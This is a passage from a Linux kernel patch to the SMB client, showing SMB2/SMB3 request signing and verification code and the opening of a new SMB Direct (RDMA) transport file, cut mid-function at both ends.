++		if (rc)
++			return rc;
++	} else {
++		shash = server->secmech.aes_cmac;
++	}
++
++	memset(smb3_signature, 0x0, SMB2_CMACAES_SIZE);
++	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
++
++	rc = crypto_shash_setkey(shash->tfm, key, SMB2_CMACAES_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not set key for cmac aes\n", __func__);
++		goto out;
++	}
++
++	/*
++	 * we already allocate aes_cmac when we init smb3 signing key,
++	 * so unlike smb2 case we do not have to check here if secmech are
++	 * initialized
++	 */
++	rc = crypto_shash_init(shash);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not init cmac aes\n", __func__);
++		goto out;
++	}
++
++	/*
++	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
++	 * data, that is, iov[0] should not contain a rfc1002 length.
++	 *
++	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
++	 * __cifs_calc_signature().
++	 */
++	drqst = *rqst;
++	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
++		rc = crypto_shash_update(shash, iov[0].iov_base,
++					 iov[0].iov_len);
++		if (rc) {
++			cifs_server_dbg(VFS, "%s: Could not update with payload\n",
++				 __func__);
++			goto out;
++		}
++		drqst.rq_iov++;
++		drqst.rq_nvec--;
++	}
++
++	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
++	if (!rc)
++		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
++
++out:
++	if (allocate_crypto)
++		cifs_free_hash(&shash);
++	return rc;
++}
++
++/* must be called with server->srv_mutex held */
++static int
++smb2_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	struct smb2_hdr *shdr;
++	struct smb2_sess_setup_req *ssr;
++	bool is_binding;
++	bool is_signed;
++
++	shdr = (struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++	ssr = (struct smb2_sess_setup_req *)shdr;
++
++	is_binding = shdr->Command == SMB2_SESSION_SETUP &&
++		(ssr->Flags & SMB2_SESSION_REQ_FLAG_BINDING);
++	is_signed = shdr->Flags & SMB2_FLAGS_SIGNED;
++
++	if (!is_signed)
++		return 0;
++	spin_lock(&server->srv_lock);
++	if (server->ops->need_neg &&
++	    server->ops->need_neg(server)) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	spin_unlock(&server->srv_lock);
++	if (!is_binding && !server->session_estab) {
++		strncpy(shdr->Signature, "BSRSPYL", 8);
++		return 0;
++	}
++
++	rc = server->ops->calc_signature(rqst, server, false);
++
++	return rc;
++}
++
++int
++smb2_verify_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server)
++{
++	unsigned int rc;
++	char server_response_sig[SMB2_SIGNATURE_SIZE];
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++
++	if ((shdr->Command == SMB2_NEGOTIATE) ||
++	    (shdr->Command == SMB2_SESSION_SETUP) ||
++	    (shdr->Command == SMB2_OPLOCK_BREAK) ||
++	    server->ignore_signature ||
++	    (!server->session_estab))
++		return 0;
++
++	/*
++	 * BB what if signatures are supposed to be on for session but
++	 * server does not send one? BB
++	 */
++
++	/* Do not need to verify session setups with signature "BSRSPYL " */
++	if (memcmp(shdr->Signature, "BSRSPYL ", 8) == 0)
++		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
++			 shdr->Command);
++
++	/*
++	 * Save off the origiginal signature so we can modify the smb and check
++	 * our calculated signature against what the server sent.
++	 */
++	memcpy(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE);
++
++	memset(shdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++
++	rc = server->ops->calc_signature(rqst, server, true);
++
++	if (rc)
++		return rc;
++
++	if (memcmp(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE)) {
++		cifs_dbg(VFS, "sign fail cmd 0x%x message id 0x%llx\n",
++			shdr->Command, shdr->MessageId);
++		return -EACCES;
++	} else
++		return 0;
++}
++
++/*
++ * Set message id for the request. Should be called after wait_for_free_request
++ * and when srv_mutex is held.
++ */
++static inline void
++smb2_seq_num_into_buf(struct TCP_Server_Info *server,
++		      struct smb2_hdr *shdr)
++{
++	unsigned int i, num = le16_to_cpu(shdr->CreditCharge);
++
++	shdr->MessageId = get_next_mid64(server);
++	/* skip message numbers according to CreditCharge field */
++	for (i = 1; i < num; i++)
++		get_next_mid(server);
++}
++
++static struct mid_q_entry *
++smb2_mid_entry_alloc(const struct smb2_hdr *shdr,
++		     struct TCP_Server_Info *server)
++{
++	struct mid_q_entry *temp;
++	unsigned int credits = le16_to_cpu(shdr->CreditCharge);
++
++	if (server == NULL) {
++		cifs_dbg(VFS, "Null TCP session in smb2_mid_entry_alloc\n");
++		return NULL;
++	}
++
++	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
++	memset(temp, 0, sizeof(struct mid_q_entry));
++	kref_init(&temp->refcount);
++	temp->mid = le64_to_cpu(shdr->MessageId);
++	temp->credits = credits > 0 ? credits : 1;
++	temp->pid = current->pid;
++	temp->command = shdr->Command; /* Always LE */
++	temp->when_alloc = jiffies;
++	temp->server = server;
++
++	/*
++	 * The default is for the mid to be synchronous, so the
++	 * default callback just wakes up the current task.
++	 */
++	get_task_struct(current);
++	temp->creator = current;
++	temp->callback = cifs_wake_up_task;
++	temp->callback_data = current;
++
++	atomic_inc(&mid_count);
++	temp->mid_state = MID_REQUEST_ALLOCATED;
++	trace_smb3_cmd_enter(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			     le64_to_cpu(shdr->SessionId),
++			     le16_to_cpu(shdr->Command), temp->mid);
++	return temp;
++}
++
++static int
++smb2_get_mid_entry(struct cifs_ses *ses, struct TCP_Server_Info *server,
++		   struct smb2_hdr *shdr, struct mid_q_entry **mid)
++{
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++
++	if (server->tcpStatus == CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		cifs_dbg(FYI, "tcp session dead - return to caller to retry\n");
++		return -EAGAIN;
++	}
++
++	if (server->tcpStatus == CifsNeedNegotiate &&
++	   shdr->Command != SMB2_NEGOTIATE) {
++		spin_unlock(&server->srv_lock);
++		return -EAGAIN;
++	}
++	spin_unlock(&server->srv_lock);
++
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_NEW) {
++		if ((shdr->Command != SMB2_SESSION_SETUP) &&
++		    (shdr->Command != SMB2_NEGOTIATE)) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are setting up session */
++	}
++
++	if (ses->ses_status == SES_EXITING) {
++		if (shdr->Command != SMB2_LOGOFF) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are shutting down the session */
++	}
++	spin_unlock(&ses->ses_lock);
++
++	*mid = smb2_mid_entry_alloc(shdr, server);
++	if (*mid == NULL)
++		return -ENOMEM;
++	spin_lock(&server->mid_lock);
++	list_add_tail(&(*mid)->qhead, &server->pending_mid_q);
++	spin_unlock(&server->mid_lock);
++
++	return 0;
++}
++
++int
++smb2_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++		   bool log_error)
++{
++	unsigned int len = mid->resp_buf_size;
++	struct kvec iov[1];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 1 };
++
++	iov[0].iov_base = (char *)mid->resp_buf;
++	iov[0].iov_len = len;
++
++	dump_smb(mid->resp_buf, min_t(u32, 80, len));
++	/* convert the length into a more usable form */
++	if (len > 24 && server->sign && !mid->decrypted) {
++		int rc;
++
++		rc = smb2_verify_signature(&rqst, server);
++		if (rc)
++			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
++				 rc);
++	}
++
++	return map_smb2_to_linux_error(mid->resp_buf, log_error);
++}
++
++struct mid_q_entry *
++smb2_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *server,
++		   struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	smb2_seq_num_into_buf(server, shdr);
++
++	rc = smb2_get_mid_entry(ses, server, shdr, &mid);
++	if (rc) {
++		revert_current_mid_from_hdr(server, shdr);
++		return ERR_PTR(rc);
++	}
++
++	rc = smb2_sign_rqst(rqst, server);
++	if (rc) {
++		revert_current_mid_from_hdr(server, shdr);
++		delete_mid(mid);
++		return ERR_PTR(rc);
++	}
++
++	return mid;
++}
++
++struct mid_q_entry *
++smb2_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedNegotiate &&
++	   shdr->Command != SMB2_NEGOTIATE) {
++		spin_unlock(&server->srv_lock);
++		return ERR_PTR(-EAGAIN);
++	}
++	spin_unlock(&server->srv_lock);
++
++	smb2_seq_num_into_buf(server, shdr);
++
++	mid = smb2_mid_entry_alloc(shdr, server);
++	if (mid == NULL) {
++		revert_current_mid_from_hdr(server, shdr);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	rc = smb2_sign_rqst(rqst, server);
++	if (rc) {
++		revert_current_mid_from_hdr(server, shdr);
++		release_mid(mid);
++		return ERR_PTR(rc);
++	}
++
++	return mid;
++}
++
++int
++smb3_crypto_aead_allocate(struct TCP_Server_Info *server)
++{
++	struct crypto_aead *tfm;
++
++	if (!server->secmech.enc) {
++		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
++		else
++			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
++		if (IS_ERR(tfm)) {
++			cifs_server_dbg(VFS, "%s: Failed alloc encrypt aead\n",
++				 __func__);
++			return PTR_ERR(tfm);
++		}
++		server->secmech.enc = tfm;
++	}
++
++	if (!server->secmech.dec) {
++		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
++		else
++			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
++		if (IS_ERR(tfm)) {
++			crypto_free_aead(server->secmech.enc);
++			server->secmech.enc = NULL;
++			cifs_server_dbg(VFS, "%s: Failed to alloc decrypt aead\n",
++				 __func__);
++			return PTR_ERR(tfm);
++		}
++		server->secmech.dec = tfm;
++	}
++
++	return 0;
++}
+diff --git a/fs/smb/client/smbdirect.c b/fs/smb/client/smbdirect.c
+new file mode 100644
+index 0000000000000..cf923f211c512
+--- /dev/null
++++ b/fs/smb/client/smbdirect.c
+@@ -0,0 +1,2494 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *
++ *   Author(s): Long Li <longli@microsoft.com>
++ */
++#include <linux/module.h>
++#include <linux/highmem.h>
++#include "smbdirect.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++
++static struct smbd_response *get_empty_queue_buffer(
++		struct smbd_connection *info);
++static struct smbd_response *get_receive_buffer(
++		struct smbd_connection *info);
++static void put_receive_buffer(
++		struct smbd_connection *info,
++		struct smbd_response *response);
++static int allocate_receive_buffers(struct smbd_connection *info, int num_buf);
++static void destroy_receive_buffers(struct smbd_connection *info);
++
++static void put_empty_packet(
++		struct smbd_connection *info, struct smbd_response *response);
++static void enqueue_reassembly(
++		struct smbd_connection *info,
++		struct smbd_response *response, int data_length);
++static struct smbd_response *_get_first_reassembly(
++		struct smbd_connection *info);
++
++static int smbd_post_recv(
++		struct smbd_connection *info,
++		struct smbd_response *response);
++
++static int smbd_post_send_empty(struct smbd_connection *info);
++static int smbd_post_send_data(
++		struct smbd_connection *info,
++		struct kvec *iov, int n_vec, int remaining_data_length);
++static int smbd_post_send_page(struct smbd_connection *info,
++		struct page *page, unsigned long offset,
++		size_t size, int remaining_data_length);
++
++static void destroy_mr_list(struct smbd_connection *info);
++static int allocate_mr_list(struct smbd_connection *info);
++
++/* SMBD version number */
++#define SMBD_V1	0x0100
++
++/* Port numbers for SMBD transport */
++#define SMB_PORT	445
++#define SMBD_PORT	5445
++
++/* Address lookup and resolve timeout in ms */
++#define RDMA_RESOLVE_TIMEOUT	5000
++
++/* SMBD negotiation timeout in seconds */
++#define SMBD_NEGOTIATE_TIMEOUT	120
++
++/* SMBD minimum receive size and fragmented sized defined in [MS-SMBD] */
++#define SMBD_MIN_RECEIVE_SIZE		128
++#define SMBD_MIN_FRAGMENTED_SIZE	131072
++
++/*
++ * Default maximum number of RDMA read/write outstanding on this connection
++ * This value is possibly decreased during QP creation on hardware limit
++ */
++#define SMBD_CM_RESPONDER_RESOURCES	32
++
++/* Maximum number of retries on data transfer operations */
++#define SMBD_CM_RETRY			6
++/* No need to retry on Receiver Not Ready since SMBD manages credits */
++#define SMBD_CM_RNR_RETRY		0
++
++/*
++ * User configurable initial values per SMBD transport connection
++ * as defined in [MS-SMBD] 3.1.1.1
++ * Those may change after a SMBD negotiation
++ */
++/* The local peer's maximum number of credits to grant to the peer */
++int smbd_receive_credit_max = 255;
++
++/* The remote peer's credit request of local peer */
++int smbd_send_credit_target = 255;
++
++/* The maximum single message size can be sent to remote peer */
++int smbd_max_send_size = 1364;
++
++/*  The maximum fragmented upper-layer payload receive size supported */
++int smbd_max_fragmented_recv_size = 1024 * 1024;
++
++/*  The maximum single-message size which can be received */
++int smbd_max_receive_size = 1364;
++
++/* The timeout to initiate send of a keepalive message on idle */
++int smbd_keep_alive_interval = 120;
++
++/*
++ * User configurable initial values for RDMA transport
++ * The actual values used may be lower and are limited to hardware capabilities
++ */
++/* Default maximum number of pages in a single RDMA write/read */
++int smbd_max_frmr_depth = 2048;
++
++/* If payload is less than this byte, use RDMA send/recv not read/write */
++int rdma_readwrite_threshold = 4096;
++
++/* Transport logging functions
++ * Logging are defined as classes. They can be OR'ed to define the actual
++ * logging level via module parameter smbd_logging_class
++ * e.g. cifs.smbd_logging_class=0xa0 will log all log_rdma_recv() and
++ * log_rdma_event()
++ */
++#define LOG_OUTGOING			0x1
++#define LOG_INCOMING			0x2
++#define LOG_READ			0x4
++#define LOG_WRITE			0x8
++#define LOG_RDMA_SEND			0x10
++#define LOG_RDMA_RECV			0x20
++#define LOG_KEEP_ALIVE			0x40
++#define LOG_RDMA_EVENT			0x80
++#define LOG_RDMA_MR			0x100
++static unsigned int smbd_logging_class;
++module_param(smbd_logging_class, uint, 0644);
++MODULE_PARM_DESC(smbd_logging_class,
++	"Logging class for SMBD transport 0x0 to 0x100");
++
++#define ERR		0x0
++#define INFO		0x1
++static unsigned int smbd_logging_level = ERR;
++module_param(smbd_logging_level, uint, 0644);
++MODULE_PARM_DESC(smbd_logging_level,
++	"Logging level for SMBD transport, 0 (default): error, 1: info");
++
++#define log_rdma(level, class, fmt, args...)				\
++do {									\
++	if (level <= smbd_logging_level || class & smbd_logging_class)	\
++		cifs_dbg(VFS, "%s:%d " fmt, __func__, __LINE__, ##args);\
++} while (0)
++
++#define log_outgoing(level, fmt, args...) \
++		log_rdma(level, LOG_OUTGOING, fmt, ##args)
++#define log_incoming(level, fmt, args...) \
++		log_rdma(level, LOG_INCOMING, fmt, ##args)
++#define log_read(level, fmt, args...)	log_rdma(level, LOG_READ, fmt, ##args)
++#define log_write(level, fmt, args...)	log_rdma(level, LOG_WRITE, fmt, ##args)
++#define log_rdma_send(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_SEND, fmt, ##args)
++#define log_rdma_recv(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_RECV, fmt, ##args)
++#define log_keep_alive(level, fmt, args...) \
++		log_rdma(level, LOG_KEEP_ALIVE, fmt, ##args)
++#define log_rdma_event(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_EVENT, fmt, ##args)
++#define log_rdma_mr(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_MR, fmt, ##args)
++
++static void smbd_disconnect_rdma_work(struct work_struct *work)
++{
++	struct smbd_connection *info =
++		container_of(work, struct smbd_connection, disconnect_work);
++
++	if (info->transport_status == SMBD_CONNECTED) {
++		info->transport_status = SMBD_DISCONNECTING;
++		rdma_disconnect(info->id);
++	}
++}
++
++static void smbd_disconnect_rdma_connection(struct smbd_connection *info)
++{
++	queue_work(info->workqueue, &info->disconnect_work);
++}
++
++/* Upcall from RDMA CM */
++static int smbd_conn_upcall(
++		struct rdma_cm_id *id, struct rdma_cm_event *event)
++{
++	struct smbd_connection *info = id->context;
++
++	log_rdma_event(INFO, "event=%d status=%d\n",
++		event->event, event->status);
++
++	switch (event->event) {
++	case RDMA_CM_EVENT_ADDR_RESOLVED:
++	case RDMA_CM_EVENT_ROUTE_RESOLVED:
++		info->ri_rc = 0;
++		complete(&info->ri_done);
++		break;
++
++	case RDMA_CM_EVENT_ADDR_ERROR:
++		info->ri_rc = -EHOSTUNREACH;
++		complete(&info->ri_done);
++		break;
++
++	case RDMA_CM_EVENT_ROUTE_ERROR:
++		info->ri_rc = -ENETUNREACH;
++		complete(&info->ri_done);
++		break;
++
++	case RDMA_CM_EVENT_ESTABLISHED:
++		log_rdma_event(INFO, "connected event=%d\n", event->event);
++		info->transport_status = SMBD_CONNECTED;
++		wake_up_interruptible(&info->conn_wait);
++		break;
++
++	case RDMA_CM_EVENT_CONNECT_ERROR:
++	case RDMA_CM_EVENT_UNREACHABLE:
++	case RDMA_CM_EVENT_REJECTED:
++		log_rdma_event(INFO, "connecting failed event=%d\n", event->event);
++		info->transport_status = SMBD_DISCONNECTED;
++		wake_up_interruptible(&info->conn_wait);
++		break;
++
++	case RDMA_CM_EVENT_DEVICE_REMOVAL:
++	case RDMA_CM_EVENT_DISCONNECTED:
++		/* This happenes when we fail the negotiation */
++		if (info->transport_status == SMBD_NEGOTIATE_FAILED) {
++			info->transport_status = SMBD_DISCONNECTED;
++			wake_up(&info->conn_wait);
++			break;
++		}
++
++		info->transport_status = SMBD_DISCONNECTED;
++		wake_up_interruptible(&info->disconn_wait);
++		wake_up_interruptible(&info->wait_reassembly_queue);
++		wake_up_interruptible_all(&info->wait_send_queue);
++		break;
++
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++/* Upcall from RDMA QP */
++static void
++smbd_qp_async_error_upcall(struct ib_event *event, void *context)
++{
++	struct smbd_connection *info = context;
++
++	log_rdma_event(ERR, "%s on device %s info %p\n",
++		ib_event_msg(event->event), event->device->name, info);
++
++	switch (event->event) {
++	case IB_EVENT_CQ_ERR:
++	case IB_EVENT_QP_FATAL:
++		smbd_disconnect_rdma_connection(info);
++		break;
++
++	default:
++		break;
++	}
++}
++
++static inline void *smbd_request_payload(struct smbd_request *request)
++{
++	return (void *)request->packet;
++}
++
++static inline void *smbd_response_payload(struct smbd_response *response)
++{
++	return (void *)response->packet;
++}
++
++/* Called when a RDMA send is done */
++static void send_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	int i;
++	struct smbd_request *request =
++		container_of(wc->wr_cqe, struct smbd_request, cqe);
++
++	log_rdma_send(INFO, "smbd_request 0x%p completed wc->status=%d\n",
++		request, wc->status);
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
++		log_rdma_send(ERR, "wc->status=%d wc->opcode=%d\n",
++			wc->status, wc->opcode);
++		smbd_disconnect_rdma_connection(request->info);
++	}
++
++	for (i = 0; i < request->num_sge; i++)
++		ib_dma_unmap_single(request->info->id->device,
++			request->sge[i].addr,
++			request->sge[i].length,
++			DMA_TO_DEVICE);
++
++	if (atomic_dec_and_test(&request->info->send_pending))
++		wake_up(&request->info->wait_send_pending);
++
++	wake_up(&request->info->wait_post_send);
++
++	mempool_free(request, request->info->request_mempool);
++}
++
++static void dump_smbd_negotiate_resp(struct smbd_negotiate_resp *resp)
++{
++	log_rdma_event(INFO, "resp message min_version %u max_version %u negotiated_version %u credits_requested %u credits_granted %u status %u max_readwrite_size %u preferred_send_size %u max_receive_size %u max_fragmented_size %u\n",
++		       resp->min_version, resp->max_version,
++		       resp->negotiated_version, resp->credits_requested,
++		       resp->credits_granted, resp->status,
++		       resp->max_readwrite_size, resp->preferred_send_size,
++		       resp->max_receive_size, resp->max_fragmented_size);
++}
++
++/*
++ * Process a negotiation response message, according to [MS-SMBD]3.1.5.7
++ * response, packet_length: the negotiation response message
++ * return value: true if negotiation is a success, false if failed
++ */
++static bool process_negotiation_response(
++		struct smbd_response *response, int packet_length)
++{
++	struct smbd_connection *info = response->info;
++	struct smbd_negotiate_resp *packet = smbd_response_payload(response);
++
++	if (packet_length < sizeof(struct smbd_negotiate_resp)) {
++		log_rdma_event(ERR,
++			"error: packet_length=%d\n", packet_length);
++		return false;
++	}
++
++	if (le16_to_cpu(packet->negotiated_version) != SMBD_V1) {
++		log_rdma_event(ERR, "error: negotiated_version=%x\n",
++			le16_to_cpu(packet->negotiated_version));
++		return false;
++	}
++	info->protocol = le16_to_cpu(packet->negotiated_version);
++
++	if (packet->credits_requested == 0) {
++		log_rdma_event(ERR, "error: credits_requested==0\n");
++		return false;
++	}
++	info->receive_credit_target = le16_to_cpu(packet->credits_requested);
++
++	if (packet->credits_granted == 0) {
++		log_rdma_event(ERR, "error: credits_granted==0\n");
++		return false;
++	}
++	atomic_set(&info->send_credits, le16_to_cpu(packet->credits_granted));
++
++	atomic_set(&info->receive_credits, 0);
++
++	if (le32_to_cpu(packet->preferred_send_size) > info->max_receive_size) {
++		log_rdma_event(ERR, "error: preferred_send_size=%d\n",
++			le32_to_cpu(packet->preferred_send_size));
++		return false;
++	}
++	info->max_receive_size = le32_to_cpu(packet->preferred_send_size);
++
++	if (le32_to_cpu(packet->max_receive_size) < SMBD_MIN_RECEIVE_SIZE) {
++		log_rdma_event(ERR, "error: max_receive_size=%d\n",
++			le32_to_cpu(packet->max_receive_size));
++		return false;
++	}
++	info->max_send_size = min_t(int, info->max_send_size,
++					le32_to_cpu(packet->max_receive_size));
++
++	if (le32_to_cpu(packet->max_fragmented_size) <
++			SMBD_MIN_FRAGMENTED_SIZE) {
++		log_rdma_event(ERR, "error: max_fragmented_size=%d\n",
++			le32_to_cpu(packet->max_fragmented_size));
++		return false;
++	}
++	info->max_fragmented_send_size =
++		le32_to_cpu(packet->max_fragmented_size);
++	info->rdma_readwrite_threshold =
++		rdma_readwrite_threshold > info->max_fragmented_send_size ?
++		info->max_fragmented_send_size :
++		rdma_readwrite_threshold;
++
++
++	info->max_readwrite_size = min_t(u32,
++			le32_to_cpu(packet->max_readwrite_size),
++			info->max_frmr_depth * PAGE_SIZE);
++	info->max_frmr_depth = info->max_readwrite_size / PAGE_SIZE;
++
++	return true;
++}
++
++static void smbd_post_send_credits(struct work_struct *work)
++{
++	int ret = 0;
++	int use_receive_queue = 1;
++	int rc;
++	struct smbd_response *response;
++	struct smbd_connection *info =
++		container_of(work, struct smbd_connection,
++			post_send_credits_work);
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		wake_up(&info->wait_receive_queues);
++		return;
++	}
++
++	if (info->receive_credit_target >
++		atomic_read(&info->receive_credits)) {
++		while (true) {
++			if (use_receive_queue)
++				response = get_receive_buffer(info);
++			else
++				response = get_empty_queue_buffer(info);
++			if (!response) {
++				/* now switch to emtpy packet queue */
++				if (use_receive_queue) {
++					use_receive_queue = 0;
++					continue;
++				} else
++					break;
++			}
++
++			response->type = SMBD_TRANSFER_DATA;
++			response->first_segment = false;
++			rc = smbd_post_recv(info, response);
++			if (rc) {
++				log_rdma_recv(ERR,
++					"post_recv failed rc=%d\n", rc);
++				put_receive_buffer(info, response);
++				break;
++			}
++
++			ret++;
++		}
++	}
++
++	spin_lock(&info->lock_new_credits_offered);
++	info->new_credits_offered += ret;
++	spin_unlock(&info->lock_new_credits_offered);
++
++	/* Promptly send an immediate packet as defined in [MS-SMBD] 3.1.1.1 */
++	info->send_immediate = true;
++	if (atomic_read(&info->receive_credits) <
++		info->receive_credit_target - 1) {
++		if (info->keep_alive_requested == KEEP_ALIVE_PENDING ||
++		    info->send_immediate) {
++			log_keep_alive(INFO, "send an empty message\n");
++			smbd_post_send_empty(info);
++		}
++	}
++}
++
++/* Called from softirq, when recv is done */
++static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smbd_data_transfer *data_transfer;
++	struct smbd_response *response =
++		container_of(wc->wr_cqe, struct smbd_response, cqe);
++	struct smbd_connection *info = response->info;
++	int data_length = 0;
++
++	log_rdma_recv(INFO, "response=0x%p type=%d wc status=%d wc opcode %d byte_len=%d pkey_index=%u\n",
++		      response, response->type, wc->status, wc->opcode,
++		      wc->byte_len, wc->pkey_index);
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
++		log_rdma_recv(INFO, "wc->status=%d opcode=%d\n",
++			wc->status, wc->opcode);
++		smbd_disconnect_rdma_connection(info);
++		goto error;
++	}
++
++	ib_dma_sync_single_for_cpu(
++		wc->qp->device,
++		response->sge.addr,
++		response->sge.length,
++		DMA_FROM_DEVICE);
++
++	switch (response->type) {
++	/* SMBD negotiation response */
++	case SMBD_NEGOTIATE_RESP:
++		dump_smbd_negotiate_resp(smbd_response_payload(response));
++		info->full_packet_received = true;
++		info->negotiate_done =
++			process_negotiation_response(response, wc->byte_len);
++		complete(&info->negotiate_completion);
++		break;
++
++	/* SMBD data transfer packet */
++	case SMBD_TRANSFER_DATA:
++		data_transfer = smbd_response_payload(response);
++		data_length = le32_to_cpu(data_transfer->data_length);
++
++		/*
++		 * If this is a packet with data playload place the data in
++		 * reassembly queue and wake up the reading thread
++		 */
++		if (data_length) {
++			if (info->full_packet_received)
++				response->first_segment = true;
++
++			if (le32_to_cpu(data_transfer->remaining_data_length))
++				info->full_packet_received = false;
++			else
++				info->full_packet_received = true;
++
++			enqueue_reassembly(
++				info,
++				response,
++				data_length);
++		} else
++			put_empty_packet(info, response);
++
++		if (data_length)
++			wake_up_interruptible(&info->wait_reassembly_queue);
++
++		atomic_dec(&info->receive_credits);
++		info->receive_credit_target =
++			le16_to_cpu(data_transfer->credits_requested);
++		if (le16_to_cpu(data_transfer->credits_granted)) {
++			atomic_add(le16_to_cpu(data_transfer->credits_granted),
++				&info->send_credits);
++			/*
++			 * We have new send credits granted from remote peer
++			 * If any sender is waiting for credits, unblock it
++			 */
++			wake_up_interruptible(&info->wait_send_queue);
++		}
++
++		log_incoming(INFO, "data flags %d data_offset %d data_length %d remaining_data_length %d\n",
++			     le16_to_cpu(data_transfer->flags),
++			     le32_to_cpu(data_transfer->data_offset),
++			     le32_to_cpu(data_transfer->data_length),
++			     le32_to_cpu(data_transfer->remaining_data_length));
++
++		/* Send a KEEP_ALIVE response right away if requested */
++		info->keep_alive_requested = KEEP_ALIVE_NONE;
++		if (le16_to_cpu(data_transfer->flags) &
++				SMB_DIRECT_RESPONSE_REQUESTED) {
++			info->keep_alive_requested = KEEP_ALIVE_PENDING;
++		}
++
++		return;
++
++	default:
++		log_rdma_recv(ERR,
++			"unexpected response type=%d\n", response->type);
++	}
++
++error:
++	put_receive_buffer(info, response);
++}
++
++static struct rdma_cm_id *smbd_create_id(
++		struct smbd_connection *info,
++		struct sockaddr *dstaddr, int port)
++{
++	struct rdma_cm_id *id;
++	int rc;
++	__be16 *sport;
++
++	id = rdma_create_id(&init_net, smbd_conn_upcall, info,
++		RDMA_PS_TCP, IB_QPT_RC);
++	if (IS_ERR(id)) {
++		rc = PTR_ERR(id);
++		log_rdma_event(ERR, "rdma_create_id() failed %i\n", rc);
++		return id;
++	}
++
++	if (dstaddr->sa_family == AF_INET6)
++		sport = &((struct sockaddr_in6 *)dstaddr)->sin6_port;
++	else
++		sport = &((struct sockaddr_in *)dstaddr)->sin_port;
++
++	*sport = htons(port);
++
++	init_completion(&info->ri_done);
++	info->ri_rc = -ETIMEDOUT;
++
++	rc = rdma_resolve_addr(id, NULL, (struct sockaddr *)dstaddr,
++		RDMA_RESOLVE_TIMEOUT);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_addr() failed %i\n", rc);
++		goto out;
++	}
++	rc = wait_for_completion_interruptible_timeout(
++		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
++	/* e.g. if interrupted returns -ERESTARTSYS */
++	if (rc < 0) {
++		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
++		goto out;
++	}
++	rc = info->ri_rc;
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_addr() completed %i\n", rc);
++		goto out;
++	}
++
++	info->ri_rc = -ETIMEDOUT;
++	rc = rdma_resolve_route(id, RDMA_RESOLVE_TIMEOUT);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_route() failed %i\n", rc);
++		goto out;
++	}
++	rc = wait_for_completion_interruptible_timeout(
++		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
++	/* e.g. if interrupted returns -ERESTARTSYS */
++	if (rc < 0)  {
++		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
++		goto out;
++	}
++	rc = info->ri_rc;
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_route() completed %i\n", rc);
++		goto out;
++	}
++
++	return id;
++
++out:
++	rdma_destroy_id(id);
